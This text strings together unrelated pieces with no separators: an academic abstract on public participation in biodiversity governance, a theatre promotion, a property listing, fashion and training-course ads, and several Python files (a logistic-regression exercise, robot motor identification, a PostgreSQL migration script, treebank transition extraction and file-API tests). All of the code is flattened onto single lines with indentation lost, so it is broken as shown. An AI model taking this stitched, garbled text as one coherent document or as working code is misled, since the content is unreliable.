Current laws in many countries around the world, and in EU member-states in particular, have made the consultation of affected publics mandatory for such decisions as the sitting of energy facilities, urban re-habilitation or the designation of protected areas. This has made exercises of public engagement a generalized practice. However, the growing literature that addresses the perspectives of experts (scientists and decision-makers) about this engagement shows how the public is systematically constructed as unresponsive, indifferent, as needing information more than participation, and as appeasable by having certain specific concerns addressed. This ‘imagined public’ works as a rational for experts to opt, most of the times, for weak versions of public engagement, and this, in turn, contributes for reproducing and perpetuating an old image of the public under the new legislation. However, there is one further dimension that is crucial for understanding the dynamics of public engagement: knowing how the publics imagine themselves and whether or not these imaginations reproduce the models of the public with which the experts work. Yet, this is a much less studied topic. In this presentation we will look at how the publics imagine themselves. We present data from 9 focus groups with rural communities subjected to decisions linked to Natura 2000 biodiversity protection laws. The residents describe episodes of local civic engagement and talk about barriers and facilitators to engagement. The analyses show that, in several dimensions, the residents lack new forms of imagination, i.e., they imagine themselves as they are imagined by the experts. Other aspects are, however, contested, and the will to participate never leaves the discourses, thus opening space for agency and for new formats of engagement, even if these are not very specific. The consequences of this for governance and the advancement of environmental goals are discussed. Castro, Paula, Carla Mouro, and Leonor Bettencourt. "Imagining ourselves as participating publics  an example from biodiversity governance." In Transitions to sustainable societies: Designing research and policies for changing lifestyles and communities. IAPS. Timisoara, Romania, 2014. Devine-Wright, P. "Investigating the Role of Procedural Justice in Explaining Different Forms of Protest Behaviours: a Powerline Case Study." In Human Experience in the Natural and Built Environment: Implications for Research, Policy and Practice (IAPS 22 Conference, Abstracts of Presentations). IAPS. Glasgow, UK: University of Strathclyde, 2012.
import scipy.io as sio import matplotlib.pyplot as plt import numpy as np from scipy.optimize import minimize from common_functions import add_zero_feature, cf_lr as cost_function, gf_lr as grad_function, \ cf_lr_reg as cost_function_reg, gf_lr_reg as grad_function_reg if __name__ == '__main__': data = sio.loadmat('ex3data1.mat') y = data['y'] X = data['X'] # replace 10 by 0 y = y % 10 n_sampels = 100 sampels = np.random.choice(len(X), n_sampels) fig = plt.figure(figsize=(8, 8)) # figure size in inches fig.subplots_adjust(left=0, right=1, bottom=0, top=1, hspace=0.05, wspace=0.05) for i, j in enumerate(sampels): ax = fig.add_subplot(10, 10, i + 1, xticks=[], yticks=[]) ax.imshow(X[j, :].reshape(20, 20).T, cmap=plt.cm.binary, interpolation='nearest') ax.text(0, 7, str(y[j, 0])) plt.show() num_labels = 10 X = add_zero_feature(X) m, n = X.shape initial_theta = np.ones((n, 1)) all_theta = np.vstack([minimize(cost_function, initial_theta, method='BFGS', jac=grad_function, options={'disp': True, 'maxiter':100}, args=(X, (y == i).astype(int))).x for i in range(num_labels)]) y_pred = np.argmax(np.dot(X, all_theta.T), axis=1) print 'Training Set Accuracy: {}'.format(np.mean(y_pred == y.ravel()) * 100) # Use regularization lambda_coef = 0.1 all_theta = np.vstack([minimize(cost_function_reg, initial_theta, method='BFGS', jac=grad_function_reg, options={'disp': True, 'maxiter':100}, args=(X, (y == i).astype(int), lambda_coef)).x for i in range(num_labels)]) y_pred = np.argmax(np.dot(X, all_theta.T), axis=1) print 'Training Set Accuracy: {}'.format(np.mean(y_pred == y.ravel()) * 100)
Grab your group and join us for this complimentary pre-show mixer for groups of 10 or more. Mix and mingle with members of other theatre-loving groups while enjoying music, complimentary cocktails and appetizers provided by Mandola’s Catering. Tickets are $28. InterACT is a great way to mix and mingle prior to seeing the performance. Treat your group to an evening of fun and come interact with the Alley – space is limited so call today! Contact the Group Sales Department at 713.315.3346 or email [email protected] to purchase tickets, inquire about group rates, seat availability, easy payment options and flexible payment due dates. If you have a promo code, click the Buy Tickets button below and enter your promo code. Winner of the 1981 Pulitzer Prize and New York Drama Critics Circle Award, Beth Henley’s first play brings you to the Mississippi home of the Magrath sisters.Warm-hearted, irreverent, and imaginative, Crimes of the Heart teams with humanity as the sisters forgive the past, face the present, and embrace the future. Renowned Director Theresa Rebeck returns to the Alley to direct.
# -*- coding: utf-8 -*- """ Created on Tue Sep 12 18:47:50 2017 @author: adelpret """ import numpy as np from scipy import ndimage import matplotlib.pyplot as plt from identification_utils import solve1stOrderLeastSquare from dynamic_graph.sot.torque_control.hrp2.control_manager_conf import IN_OUT_GAIN def identify_motor_static(enc, dq, ctrl, current, tau, JOINT_ID, JOINT_NAME, ZERO_VELOCITY_THRESHOLD, ZERO_VELOCITY_THRESHOLD_SMALL, SHOW_THRESHOLD_EFFECT): # remove high velocity maskConstAng = (abs (dq)<ZERO_VELOCITY_THRESHOLD) # erode to get only steady phases where velocity is small maskConstAng=ndimage.morphology.binary_erosion(maskConstAng,None,100) maskPosVel=(dq> ZERO_VELOCITY_THRESHOLD_SMALL) maskNegVel=(dq<-ZERO_VELOCITY_THRESHOLD_SMALL) maskConstPosAng=np.logical_and( maskConstAng ,maskPosVel ) maskConstNegAng=np.logical_and( maskConstAng ,maskNegVel ) if SHOW_THRESHOLD_EFFECT : plt.figure() plt.plot(enc, label='q') q_const=enc.copy() q_const[np.logical_not(maskConstAng)]=np.nan plt.plot(q_const, label='q_const') plt.legend() # identify current sensor gain x = current[maskConstAng] y = ctrl[maskConstAng]/IN_OUT_GAIN maskPosErr = np.logical_and(y - x > 0.0, np.abs(x)>0.5) maskNegErr = np.logical_and(y - x < 0.0, np.abs(x)>0.5) print "Number of samples with constant angle:", x.shape[0] print "Number of samples with constant angle and pos vel:", x[maskPosErr].shape[0] print "Number of samples with constant angle and neg vel:", x[maskNegErr].shape[0] if(x[maskPosErr].shape[0]<10): (Ks,DZ)=solve1stOrderLeastSquare(x[maskNegErr], y[maskNegErr]) elif(x[maskNegErr].shape[0]<10): (Ks,DZ)=solve1stOrderLeastSquare(x[maskPosErr], y[maskPosErr]) else: (Ksn,DZn)=solve1stOrderLeastSquare(x[maskNegErr], y[maskNegErr]) (Ksp,DZp)=solve1stOrderLeastSquare(x[maskPosErr], y[maskPosErr]) Ks = 0.5*(Ksp+Ksn); Ks = min([Ksp, Ksn]); DZ = 0.5*(DZp-DZn); print "Current sensor gains = ", Ksp, Ksn; print "Deadzones = ", DZp, -DZn; x_neg = x[maskNegErr] y_neg = y[maskNegErr] plt.figure() plt.plot(x_neg, y_neg,'.' ,lw=3,markersize=1,c='0.5'); plt.plot([min(x_neg),max(x_neg)],[Ksn*min(x_neg)+DZn ,Ksn*max(x_neg)+DZn],'g:',lw=3) plt.ylabel(r'$i(t)$'); plt.xlabel(r'$u(t)$') plt.title('Negative current errors - Joint '+JOINT_NAME) x_pos = x[maskPosErr] y_pos = y[maskPosErr] plt.figure() plt.plot(x_pos, y_pos,'.' ,lw=3,markersize=1,c='0.5'); plt.plot([min(x_pos),max(x_pos)],[Ksp*min(x_pos)+DZp ,Ksp*max(x_pos)+DZp],'g:',lw=3) plt.ylabel(r'$i(t)$'); plt.xlabel(r'$u(t)$') plt.title('Positive current errors - Joint '+JOINT_NAME) plt.show() if(Ks<0.0): print "ERROR: estimated Ks is negative! Setting it to 1" Ks = 1.0; # plot dead zone effect ******************************************** plt.figure() plt.plot(Ks*current, label='current') plt.plot(ctrl/IN_OUT_GAIN, label='control') plt.legend() plt.figure() y = Ks*current[maskConstAng] x = ctrl[maskConstAng]/IN_OUT_GAIN - Ks*current[maskConstAng] plt.ylabel(r'$i(t)$') plt.xlabel(r'$ctrl(t)-i(t)$') plt.plot(x,y,'.' ,lw=3,markersize=1,c='0.5'); plt.plot(x[maskPosErr],y[maskPosErr],'rx',lw=3,markersize=1, label='pos err'); plt.plot(x[maskNegErr],y[maskNegErr],'bx',lw=3,markersize=1, label='neg err'); plt.legend() plt.figure() y = ctrl[maskConstAng]/IN_OUT_GAIN x = ctrl[maskConstAng]/IN_OUT_GAIN - Ks*current[maskConstAng] plt.ylabel(r'$ctrl(t)$') plt.xlabel(r'$ctrl(t)-i(t)$') plt.plot(x,y,'.' ,lw=3,markersize=1,c='0.5'); plt.plot(x[maskPosErr],y[maskPosErr],'rx',lw=3,markersize=1, label='pos err'); plt.plot(x[maskNegErr],y[maskNegErr],'bx',lw=3,markersize=1, label='neg err'); plt.legend() plt.figure() y = ctrl/IN_OUT_GAIN x = Ks*current plt.ylabel(r'$ctrl(t)$') plt.xlabel(r'$i(t)$') plt.plot(x,y,'.' ,lw=3,markersize=1,c='0.5'); plt.plot([-3,3],[-3,3]); plt.show() # y = a. x + b # i = Kt.tau + Kf # Identification *************************************************** y = current #*Ks x = tau (Ktp,Kfp)=solve1stOrderLeastSquare(x[maskConstPosAng],y[maskConstPosAng]) (Ktn,b)=solve1stOrderLeastSquare(x[maskConstNegAng],y[maskConstNegAng]) Kfn=-b # Plot ************************************************************* plt.figure() plt.axhline(0, color='black',lw=1) plt.axvline(0, color='black',lw=1) plt.plot(x ,y ,'.' ,lw=3,markersize=1,c='0.5'); plt.plot(x[maskConstPosAng],y[maskConstPosAng],'rx',lw=3,markersize=1); plt.plot(x[maskConstNegAng],y[maskConstNegAng],'bx',lw=3,markersize=1); #plot identified lin model plt.plot([min(x),max(x)],[Ktp*min(x)+Kfp ,Ktp*max(x)+Kfp],'g:',lw=3) plt.plot([min(x),max(x)],[Ktn*min(x)-Kfn ,Ktn*max(x)-Kfn],'g:',lw=3) plt.ylabel(r'$i(t)$') plt.xlabel(r'$\tau(t)$') plt.title('Static experiment - Joint '+JOINT_NAME) print "cur_sens_gain[%d] = %f" % (JOINT_ID, Ks); print 'deadzone[%d] = %f' % (JOINT_ID, DZ); print 'Kt_p[%d] = %f' % (JOINT_ID,Ktp); print 'Kt_n[%d] = %f' % (JOINT_ID,Ktn); print 'Kf_p[%d] = %f' % (JOINT_ID,Kfp); print 'Kf_n[%d] = %f' % (JOINT_ID,Kfn); print 'Kt_m[%d] = %f' % (JOINT_ID,(Ktp+Ktn)/2.0); print 'Kf_m[%d] = %f' % (JOINT_ID,(Kfp+Kfn)/2.0); return (Ktp, Ktn, Ks, DZ);
From fashion designers to apparel retailers, the fashion and retail industry has brought some people so much wealth, success and prosperity. When you look at these people with successful careers in the fashion and retail industry, you instantly wonder just how they got there. Here, you will read some inspiring stories of successful people in fashion and retail. While success is achieved only by a combination of hard work, luck and perfect timing, their creation stories can be quite interesting and intriguing. Most of these stories are intriguing, and offer lessons that anyone can learn from and take home. Some famous people in the fashion and retail industry opted for unconventional routes, and said ‘yes’ to almost everything in the initial stages of their career. Going that extra mile set them apart from the competitors, and explored their creative capabilities. Some have been successful at combining digital tactics to their passion in fashion. Believe it or not, passion is the key in the fashion industry. As digital field is vital to the stream, you should be ready to learn as well. Taking risks is important too, as any right or wrong decision can have a great impact on the designer’s performance and creativity. A fashion enthusiast should be determined, and be ready to ride a rollercoaster everyday. These inspiring stories of people in fashion and retail will give you an idea about how they became known names in the fashion and retail industry, and what it took to reach there.
# # Copyright (c) SAS Institute Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """ Shut down PostgreSQL, check if it needs updating, then start it again. """ import logging import optparse import os import signal import subprocess import tempfile import time import traceback from conary.lib import cfg as cfgmod from conary.lib import cfgtypes from conary.lib import util as cny_util from mint import config from mint.scripts import postgres_major_migrate log = logging.getLogger('auto_update') class PostgresMeta(cfgmod.ConfigFile): version = cfgtypes.CfgString binDir = cfgtypes.CfgPath dataDir = cfgtypes.CfgPath class Script(postgres_major_migrate.Script): logFileName = 'scripts.log' newLogger = True port = 5439 user = 'postgres' dataTop = '/srv/pgsql' currentMetaPath = '/srv/rbuilder/data/postgres-meta' nextMetaPath = '/usr/share/rbuilder/postgres-meta' def action(self): parser = optparse.OptionParser() parser.add_option('-c', '--config-file', default=config.RBUILDER_CONFIG) parser.add_option('-q', '--quiet', action='store_true') parser.add_option('--init', action='store_true') options, args = parser.parse_args() self.loadConfig(options.config_file) self.resetLogging(quiet=options.quiet) currentMeta = self.getCurrentMeta() nextMeta = self.getNextMeta() if currentMeta and currentMeta.dataDir == nextMeta.dataDir: return 0 self.stopPostgres() if not currentMeta: self.initdb(nextMeta) else: self.migrateMeta(currentMeta, nextMeta) self.startPostgres() def stopPostgres(self): """Kill postgres by checking its UNIX socket.""" log.info("Stopping PostgreSQL on port %s", self.port) sockPath = '/tmp/.s.PGSQL.%s' % self.port # Send progressively more aggressive sigals until it dies. signals = ([signal.SIGINT] * 4 ) + ([signal.SIGQUIT] * 2 ) + [signal.SIGKILL] while signals: if not os.path.exists(sockPath): return signum = signals.pop(0) if not self._stopPostgres(sockPath, signum): # No process is listening on that socket. return sleepUntil = time.time() + 15 while time.time() < sleepUntil: if not os.path.exists(sockPath): return time.sleep(0.1) @staticmethod def _stopPostgres(sockPath, signal): # Use netstat to figure out what processes own the socket. netstat = subprocess.Popen(['netstat', '-lpnxT'], shell=False, stdout=subprocess.PIPE).communicate()[0] found = False for line in netstat.splitlines(): words = line.split() if sockPath not in words: continue i = words.index(sockPath) process = words[i-1] pid, name = process.split('/') if name not in ('postmaster', 'postgres'): continue os.kill(int(pid), signal) found = True return found def getCurrentMeta(self): """Get metadata about the current PostgreSQL cluster.""" cfg = PostgresMeta() if os.path.exists(self.currentMetaPath): cfg.read(self.currentMetaPath) return cfg # rBuilder <= 5.8.0 doesn't have a meta file. Use the highest-numbered # datadir as the "current" cluster. if not os.path.isdir(self.dataTop): return None versions = [] for name in os.listdir(self.dataTop): if name[-9:] != '-rbuilder': continue path = os.path.join(self.dataTop, name) version = name[:-9] try: parts = [int(x) for x in version.split('.')] except ValueError: continue versions.append((parts, version, path)) if not versions: # No postgres data dir found. return None versions.sort() _, cfg.version, cfg.dataDir = versions[-1] cfg.binDir = '/opt/postgresql-%s/bin' % (cfg.version,) cfg.writeToFile(self.currentMetaPath, includeDocs=False) return cfg def getNextMeta(self): """Get metadata about the version of PostgreSQL that will be used after the (possible) upgrade. """ cfg = PostgresMeta() cfg.read(self.nextMetaPath) return cfg def updateMeta(self, nextMeta): """Update the "current" metadata file.""" nextMeta.writeToFile(self.currentMetaPath, includeDocs=False) def initdb(self, meta): """Create a new postgres cluster at the given location.""" log.info("Initializing PostgreSQL %s cluster", meta.version) assert not os.path.exists(meta.dataDir) self.loadPrivs(user=self.user) parentDir = os.path.dirname(meta.dataDir) if not os.path.isdir(parentDir): os.makedirs(parentDir) tempDir = tempfile.mkdtemp(dir=parentDir) try: os.chown(tempDir, self.uidgid[0], self.uidgid[1]) self.dropPrivs() cluster = postgres_major_migrate.Postmaster(dataDir=tempDir, binDir=meta.binDir, port=65000, logPath='/tmp/postgres-initdb.log') cluster.initdb() self.restorePrivs() self.updateMeta(meta) os.rename(tempDir, meta.dataDir) finally: try: if os.path.isdir(tempDir): try: self.restorePrivs() except: traceback.print_exc() log.info("Cleaning up temporary target dir") cny_util.rmtree(tempDir) except: traceback.print_exc() def migrateMeta(self, currentMeta, nextMeta): """Migrate postgres cluster to a new version and datadir.""" log.info("Migrating PostgreSQL from %s to %s", currentMeta.version, nextMeta.version) assert currentMeta.dataDir != nextMeta.dataDir if os.path.exists(nextMeta.dataDir): # Nuke any existing data directory -- either an explicit meta file # told us that a different datadir is in use, or the heuristic # decided there was nothing of value in this one. cny_util.rmtree(nextMeta.dataDir) self.runMigration( from_bindir=currentMeta.binDir, from_datadir=currentMeta.dataDir, from_port=None, to_bindir=nextMeta.binDir, to_datadir=nextMeta.dataDir, user=self.user, ) self.updateMeta(nextMeta) os.rename(currentMeta.dataDir, currentMeta.dataDir + '.old') def startPostgres(self): os.system("/sbin/service postgresql-rbuilder start") cluster = postgres_major_migrate.DummyCluster(self.port, user=self.user) cluster.waitForPostgres()
BEAUTIFUL, BRIGHT, NEUTRAL CAMDEN MODEL. 1700 SQ FT, TWO-STORY SOARING RAILED ENTRY AND LIVING ROOM. MARBLE SURROUND GAS FIREPLACE. LARGE, FULLY-APPLIANCED KITCHEN, BREAKFAST BAR. OAK CABINETS. HUGE EATING AREA WITH SLIDERS TO PATIO. HUGE MASTER SUITE AND BATH. TRUE 3-BEDROOM, 2.1 BATH, 2+ CAR GARAGE. VERY NEUTRAL, FANTASTIC SCHOOLS. 815 Blue Spruce Court Lindenhurst, Illinois 60046 is a townhome property, which sold for $129,900. 815 Blue Spruce Court has 3 bedroom(s) and 3 bath(s). Want to learn more about 815 Blue Spruce Court Lindenhurst, Illinois 60046? Contact an @properties agent to request more info.
"""treetools: Tools for transforming treebank trees. This module provides functions and classes for transition extraction. Author: Wolfgang Maier <[email protected]> """ import argparse import sys from . import trees, treeinput, transform from . import misc, transitionoutput class Transition(): def __init__(self, name): self.name = name def pretty_print(self): return self.name def __str__(self): return self.name def topdown(tree): """Extract transitions topdown for continuous trees. """ terminals = [(terminal.data['word'], terminal.data['label']) for terminal in trees.terminals(tree)] transitions = [] for node in trees.preorder(tree): children = trees.children(node) if len(children) == 0: transitions.append(Transition("SHIFT")) elif len(children) == 1: transitions.append(Transition("UNARY-%s" % node.data["label"])) elif len(children) == 2: if 'head' not in children[0].data: raise ValueError("heads are supposed to be marked") headside = "LEFT" if children[0].data['head'] else "RIGHT" transitions.append(Transition("BINARY-%s-%s" % (headside, node.data["label"]))) else: raise ValueError("trees must be binarized") print(terminals, [str(t) for t in list(reversed(transitions))], file=sys.stderr) return terminals, list(reversed(transitions)) def _inorder(tree): """Recursive inorder transition """ transitions = [] c = trees.children(tree) if len(trees.children(c[0])) == 0: transitions.append(Transition("SHIFT")) else: transitions.extend(_inorder(c[0])) transitions.append(Transition("PJ-{}".format(tree.data['label']))) for child in c[1:]: if len(trees.children(child)) == 0: transitions.append(Transition("SHIFT")) else: transitions.extend(_inorder(child)) transitions.append(Transition("REDUCE")) return transitions def inorder(tree): """Extract inorder transitions for continuous trees. """ terminals = [(terminal.data['word'], terminal.data['label']) for terminal in trees.terminals(tree)] transitions = _inorder(tree) return terminals, transitions def gap(tree): """GAP transition parsing (Coavoux & Crabbe) """ terminals = [(terminal.data['word'], terminal.data['label']) for terminal in trees.terminals(tree)] transitions = [] b = [terminal for terminal in trees.terminals(tree)] d = [] s = [] while True: if len(s) > 0 and len(d) > 0 and d[0].parent == s[0].parent: # REDUCE p = s[0].parent if 'head' not in s[0].data or 'head' not in d[0].data: raise ValueError("heads are supposed to be marked") headside = "LEFT" if s[0].data['head'] else "RIGHT" t = Transition("R-{}-{}".format(headside, p.data['label'])) transitions.append(t) s = s[1:] d = d[1:] while len(d) > 0: s = [d.pop(0)] + s d = [p] + d elif len(d) > 0 and any([n.parent == d[0].parent for i,n in enumerate(s)]): # GAP for i, n in enumerate(s): if n.parent == d[0].parent: for j in range(i): d.append(s.pop(0)) t = Transition("GAP") transitions.append(t) break else: t = Transition("SHIFT") transitions.append(t) while len(d) > 0: s = [d.pop(0)] + s d = [b.pop(0)] + d if len(s) == 0 and len(b) == 0 and len(d) == 1: break # check for unary while len(d) > 0 and d[0].parent and len(trees.children(d[0].parent)) == 1: t = Transition("UNARY-{}".format(d[0].parent.data['label'])) transitions.append(t) d[0] = d[0].parent return terminals, transitions def add_parser(subparsers): """Add an argument parser to the subparsers of treetools.py. """ parser = subparsers.add_parser('transitions', usage='%(prog)s src dest ' 'transtype [options] ', formatter_class=argparse. RawDescriptionHelpFormatter, description='transition extraction from' ' treebank trees') parser.add_argument('src', help='input file') parser.add_argument('dest', help='prefix of output files') parser.add_argument('transtype', metavar='T', choices=[t for t in TRANSTYPES], help='type of transitions (default: %(default)s)', default='topdown') parser.add_argument('--transform', metavar='TS', choices=[fun.__name__ for fun in transform.TRANSFORMATIONS], nargs='+', help='tree transformations to apply before extraction', default=[]) parser.add_argument('--transformparams', metavar='TSP', nargs='+', help='tree transformations parameters', default=[]) parser.add_argument('--src-format', metavar='FMT', choices=[fun.__name__ for fun in treeinput.INPUT_FORMATS], help='input format (default: %(default)s)', default='export') parser.add_argument('--src-enc', metavar='ENCODING', help='input encoding (default: %(default)s)', default='utf-8') parser.add_argument('--src-opts', nargs='+', metavar='O', help='space separated list of options O for reading ' 'input of the form key:value ' '(default: %(default)s)', default=[]) parser.add_argument('--dest-format', metavar='FMT', help='grammar format (default: %(default)s)', default='plain') parser.add_argument('--dest-enc', metavar='ENCODING', help='grammar encoding (default: %(default)s)', default='utf-8') parser.add_argument('--dest-opts', nargs='+', metavar='O', help='space separated list of options O for writing ' 'the transitions of the form key:value ' '(default: %(default)s)', default=[]) parser.add_argument('--verbose', action='store_true', help='More verbose ' 'messages', default=False) parser.add_argument('--usage', nargs=0, help='show detailed information ' 'about available tasks and input format/options', action=UsageAction) parser.set_defaults(func=run) return parser class UsageAction(argparse.Action): """Custom action which shows extended help on available options. """ def __call__(self, parser, namespace, values, option_string=None): title_str = misc.bold("{} help".format(sys.argv[0])) help_str = "\n\n{}\n{}\n\n{}\n{}\n\n{}\n{}\n\n{}\n{}\n\n{}\n{}".\ format(misc.make_headline("available transition types:"), misc.get_doc_opts(TRANSTYPES), misc.make_headline("available tree input formats:"), misc.get_doc(treeinput.INPUT_FORMATS), misc.make_headline("available tree input opts:"), misc.get_doc_opts(treeinput.INPUT_OPTIONS), misc.make_headline("available output formats:"), misc.get_doc(transitionoutput.FORMATS), misc.make_headline("available output opts:"), misc.get_doc_opts(transitionoutput.FORMAT_OPTIONS)) print("\n%s%s" % (title_str, help_str)) sys.exit() def run(args): """Run the transition extraction. """ print("reading from '%s' in format '%s' and encoding '%s'" % (args.src, args.src_format, args.src_enc), file=sys.stderr) tree_inputformats = [fun.__name__ for fun in treeinput.INPUT_FORMATS] transitions = [] if args.src_format in tree_inputformats: print("extracting transitions (%s)" % args.transtype, file=sys.stderr) cnt = 1 for tree in getattr(treeinput, args.src_format)(args.src, args.src_enc, **misc.options_dict (args.src_opts)): for algorithm in args.transform: print(algorithm) tree = getattr(transform, algorithm)( tree, **misc.options_dict(args.transformparams)) sentence, trans = globals()[args.transtype](tree) transitions.append((sentence, trans)) if cnt % 100 == 0: print("\r%d" % cnt, end="", file=sys.stderr) cnt += 1 else: raise ValueError("Specify input format %s" % args.src_format) print("\n", file=sys.stderr) sys.stderr.write("\nwriting transitions in format '%s', encoding '%s', to '%s'" % (args.dest_format, args.dest_enc, args.dest)) sys.stderr.write("\n") getattr(transitionoutput, args.dest_format)(transitions, args.dest, args.dest_enc, **misc.options_dict(args.dest_opts)) print("\n", file=sys.stderr) sys.exit() TRANSTYPES = {'topdown': 'Top-down continuous', 'inorder': 'Inorder continuous', 'gap': 'Gap discontinuous'}
A skilled business analyst contributes to the success of their projects by improving the requirements that project managers will process. Organizations that assign a business analyst to each project are much more likely to be successful, on time, and under budget. Systemation’s online business analyst training is tailored to fit the schedules of busy professionals and willing students alike. With our perfect blend of lectures and hands-on exercises, our courses provide participants with an easy-to-access yet advanced training experience. By taking a business analyst online course, and by developing and mastering the techniques therein, participants will learn how to work with diverse and sometimes separate teams, ask the right questions, and choose the best strategies. Understanding the technological environment, possessing a strong grasp of business requirements and exceptional communication will provide you with the edge you need to be a successful business analyst. Our courses will teach you the best way to apply the business analysis you learn to real-world situations. We will help you learn how to document these needs in detail and prepare you for presenting requirements, and recommending business process changes to management. Our Mastering the Requirements Process business analyst online course will help you learn how to capture stakeholder requests, write quality requirements statements, learn how to ask the right questions, and model existing systems. Systemation also offers a CBAP® exam preparation course aimed to assist participants in learning best practices for preparing and passing the exam. It focuses on the central concepts throughout the Business Analysis Body of Knowledge (BABOK®) version 2.0 for preparation adeptness and effectiveness. With a Systemation business analyst online course, you will be the hero of your next project and beyond. Contact us today and learn what we can provide for you and your future.
#coding: UTF-8 """ Test file/dir operations. """ import posixpath import pytest import urllib from urllib import urlencode, quote import urlparse from tests.common.utils import randstring, urljoin from tests.api.apitestbase import ApiTestBase class FilesApiTest(ApiTestBase): def test_rename_file(self): with self.get_tmp_repo() as repo: name, furl = self.create_file(repo) data = { 'operation': 'rename', 'newname': name + randstring(), } res = self.post(furl, data=data) self.assertRegexpMatches(res.text, r'"http(.*)"') def test_remove_file(self): with self.get_tmp_repo() as repo: _, furl = self.create_file(repo) res = self.delete(furl) self.assertEqual(res.text, '"success"') def test_move_file(self): with self.get_tmp_repo() as repo: _, furl = self.create_file(repo) # TODO: create another repo here, and use it as dst_repo data = { 'operation': 'move', 'dst_repo': repo.repo_id, 'dst_dir': '/', } res = self.post(furl, data=data) self.assertEqual(res.text, '"success"') def test_copy_file(self): with self.get_tmp_repo() as repo: # TODO: create another repo here, and use it as dst_repo # create sub folder(dpath) dpath, _ = self.create_dir(repo) # create tmp file in sub folder(dpath) tmp_file = 'tmp_file.txt' file_path = dpath + '/' + tmp_file furl = repo.get_filepath_url(file_path) data = {'operation': 'create'} res = self.post(furl, data=data, expected=201) # copy tmp file from sub folder(dpath) to dst dir('/') data = { 'dst_repo': repo.repo_id, 'dst_dir': '/', 'operation': 'copy', } u = urlparse.urlparse(furl) parsed_furl = urlparse.urlunparse((u.scheme, u.netloc, u.path, '', '', '')) res = self.post(parsed_furl+ '?p=' + quote(file_path), data=data) self.assertEqual(res.text, '"success"') # get info of copied file in dst dir('/') fdurl = repo.file_url + u'detail/?p=/%s' % quote(tmp_file) detail = self.get(fdurl).json() self.assertIsNotNone(detail) self.assertIsNotNone(detail['id']) def test_download_file(self): with self.get_tmp_repo() as repo: fname, furl = self.create_file(repo) res = self.get(furl) self.assertRegexpMatches(res.text, '"http(.*)/%s"' % quote(fname)) def test_download_file_without_reuse_token(self): with self.get_tmp_repo() as repo: fname, furl = self.create_file(repo) res = self.get(furl) self.assertRegexpMatches(res.text, '"http(.*)/%s"' % quote(fname)) # download for the first time url = urllib.urlopen(res.text.strip('"')) code = url.getcode() self.assertEqual(code, 200) # download for the second time url = urllib.urlopen(res.text.strip('"')) code = url.getcode() self.assertEqual(code, 400) def test_download_file_with_reuse_token(self): with self.get_tmp_repo() as repo: fname, furl = self.create_file(repo) res = self.get(furl + '&reuse=1') self.assertRegexpMatches(res.text, '"http(.*)/%s"' % quote(fname)) # download for the first time url = urllib.urlopen(res.text.strip('"')) code = url.getcode() self.assertEqual(code, 200) # download for the second time url = urllib.urlopen(res.text.strip('"')) code = url.getcode() self.assertEqual(code, 200) def test_download_file_from_history(self): with self.get_tmp_repo() as repo: fname, _ = self.create_file(repo) file_history_url = urljoin(repo.repo_url, 'history/') + \ '?p=/%s' % quote(fname) res = self.get(file_history_url).json() commit_id = res['commits'][0]['id'] self.assertEqual(len(commit_id), 40) data = { 'p': fname, 'commit_id': commit_id, } query = '?' + urlencode(data) res = self.get(repo.file_url + query) self.assertRegexpMatches(res.text, r'"http(.*)/%s"' % quote(fname)) def test_get_file_detail(self): with self.get_tmp_repo() as repo: fname, _ = self.create_file(repo) fdurl = repo.file_url + u'detail/?p=/%s' % quote(fname) detail = self.get(fdurl).json() self.assertIsNotNone(detail) self.assertIsNotNone(detail['id']) self.assertIsNotNone(detail['mtime']) self.assertIsNotNone(detail['type']) self.assertIsNotNone(detail['name']) self.assertIsNotNone(detail['size']) def test_get_file_history(self): with self.get_tmp_repo() as repo: fname, _ = self.create_file(repo) fhurl = repo.file_url + u'history/?p=%s' % quote(fname) history = self.get(fhurl).json() for commit in history['commits']: self.assertIsNotNone(commit['rev_file_size']) #self.assertIsNotNone(commit['rev_file_id']) #allow null self.assertIsNotNone(commit['ctime']) self.assertIsNotNone(commit['creator_name']) self.assertIsNotNone(commit['creator']) self.assertIsNotNone(commit['root_id']) #self.assertIsNotNone(commit['rev_renamed_old_path']) #allow null #self.assertIsNotNone(commit['parent_id']) #allow null self.assertIsNotNone(commit['new_merge']) self.assertIsNotNone(commit['repo_id']) self.assertIsNotNone(commit['desc']) self.assertIsNotNone(commit['id']) self.assertIsNotNone(commit['conflict']) #self.assertIsNotNone(commit['second_parent_id']) #allow null def test_get_upload_link(self): with self.get_tmp_repo() as repo: upload_url = urljoin(repo.repo_url, 'upload-link') res = self.get(upload_url) self.assertRegexpMatches(res.text, r'"http(.*)/upload-api/[^/]+"') def test_get_update_link(self): with self.get_tmp_repo() as repo: update_url = urljoin(repo.repo_url, 'update-link') res = self.get(update_url) self.assertRegexpMatches(res.text, r'"http(.*)/update-api/[^/]+"') # def test_upload_file(self): # # XXX: requests has problems when post a file whose name contains # # non-ascii data # fname = 'file-upload-test %s.txt' % randstring() # furl = self.test_file_url + '?p=/%s' % quote(fname) # self.delete(furl) # upload_url = self.test_repo_url + u'upload-link/' # res = self.get(upload_url) # upload_api_url = re.match(r'"(.*)"', res.text).group(1) # files = { # 'file': (fname, 'Some lines in this file'), # 'parent_dir': '/', # } # res = self.post(upload_api_url, files=files) # self.assertRegexpMatches(res.text, r'\w{40,40}') # def test_update_file(self): # fname = 'file-update-test %s.txt' % randstring() # _, furl = self.create_file(fname=fname) # update_url = self.test_repo_url + u'update-link/' # res = self.get(update_url) # update_api_url = re.match(r'"(.*)"', res.text).group(1) # files = { # 'file': ('filename', 'Updated content of this file'), # 'target_file': '/test_update.c' # } # res = self.post(update_api_url, files=files) # self.assertRegexpMatches(res.text, r'\w{40,40}') def test_get_upload_blocks_link(self): with self.get_tmp_repo() as repo: upload_blks_url = urljoin(repo.repo_url, 'upload-blks-link') res = self.get(upload_blks_url) self.assertRegexpMatches(res.text, r'"http(.*)/upload-blks-api/[^/]+"') def test_get_update_blocks_link(self): with self.get_tmp_repo() as repo: update_blks_url = urljoin(repo.repo_url, 'update-blks-link') res = self.get(update_blks_url) self.assertRegexpMatches(res.text, r'"http(.*)/update-blks-api/[^/]+"') def test_only_list_dir(self): with self.get_tmp_repo() as repo: self.create_file(repo) self.create_dir(repo) dirents = self.get(repo.dir_url + '?t=d').json() 